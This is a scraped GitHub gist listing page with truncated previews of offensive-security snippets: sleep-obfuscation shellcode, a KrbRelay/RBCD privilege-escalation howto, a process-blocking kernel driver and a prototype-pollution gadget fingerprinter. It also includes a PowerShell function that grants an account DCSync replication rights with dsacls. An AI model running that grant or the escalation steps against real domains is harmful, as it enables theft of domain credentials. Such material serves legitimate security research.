Skip to content

Instantly share code, notes, and snippets.

View klezVirus's full-sized avatar

klezVirus

1.1k followers · 30 following
View GitHub Profile
@tin-z
tin-z / VR_roadmap.md
Last active July 22, 2024 03:05
Becoming a Vulnerability Researcher roadmap: my personal experience
@mistymntncop
mistymntncop / demo.c
Last active April 17, 2024 16:09
NtWaitForDebugEvent + WaitForMultipleObjects
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <windows.h>
#include "nt_crap.h"
#define ArrayCount(arr) (sizeof(arr)/sizeof(arr[0]))
#define assert(expr) if(!(expr)) { *(char*)0 = 0; }
@WKL-Sec
WKL-Sec / FolderPathVerificationSample.cpp
Created February 5, 2024 15:33
Folder Path Verification C++ Sample: A concise C++ example demonstrating how to verify an application's execution path against a specified directory.
# White Knight Labs - Offensive Development Course
# Guardrails - Folder Check
#include <windows.h> // Include Windows-specific headers for system calls
#include <iostream> // Include for input and output stream operations
#include <string> // Include for using string class
#include <algorithm> // Include for standard algorithms, e.g., std::transform
#include <cctype> // Include for character handling functions, e.g., std::tolower
// Function to check if the path of the current executable is under a specified path
@Huntinex
Huntinex / report.py
Last active March 8, 2024 12:53
Automatic bug bounty report generator
import poe, sys
client = poe.Client("<POE_API_KEY_HERE>")
title=sys.argv[1]
path=sys.argv[2]
more=""
if len(sys.argv) > 3:
more="\" and here is more information: "+sys.argv[3]
message="""generate a bug bounty report for me (hackerone.com), the title of the bug is """+title+""" and the vulnerability path is \""""+path+more+"""
@susMdT
susMdT / shitcode.c
Last active March 26, 2024 12:40
hahaha da shellcode go brrrr
#include <Core.h>
#include <Win32.h>
#include <Structs.h>
#include <Sleep.h>
#include <Utils.h>
SEC( text, C ) VOID Ekko ( DWORD SleepTime, PINSTANCE Instance)
{
@z0rs
z0rs / Red-Teaming-tool.md
Last active May 18, 2024 06:41
@tothi
tothi / krbrelay_privesc_howto.md
Last active March 1, 2024 12:26
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
@jfmaes
jfmaes / Invoke-SyncMeUp.ps1
Created February 26, 2022 10:28
Invoke-SyncMeUp.ps1
function Invoke-SyncMeUp{
[CmdletBinding()]
Param (
[Parameter(Mandatory=$True)]
[string]$AccountName
)
$dse = [ADSI]"LDAP://Rootdse"
$namingcontext = $dse.defaultNamingContext
echo "Giving $AccountName DCSync rights"
dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes"
@veil-ivy
veil-ivy / block_create_process.cpp
Created February 22, 2022 22:15
#include <ntddk.h>
#define BLOCK_PROCESS "notepad.exe"
static OB_CALLBACK_REGISTRATION obcallback_registration;
static OB_OPERATION_REGISTRATION oboperation_callback;
#define PROCESS_CREATE_THREAD (0x0002)
#define PROCESS_CREATE_PROCESS (0x0080)
#define PROCESS_TERMINATE (0x0001)
#define PROCESS_VM_WRITE (0x0020)
#define PROCESS_VM_READ (0x0010)
#define PROCESS_VM_OPERATION (0x0008)
@renniepak
renniepak / fingerprint.js
Created December 2, 2021 12:30
Script to fingerprint Script Gadgets to use to exploit Prototype Pollution. Updated version. Original Creator: Nikita Stupin @_nikitastupin
(() => {
let gadgets = [];
if (typeof _satellite !== 'undefined') {
gadgets.push('Adobe Dynamic Tag Management');
}
if (typeof BOOMR !== 'undefined') {
gadgets.push('Akamai Boomerang');
}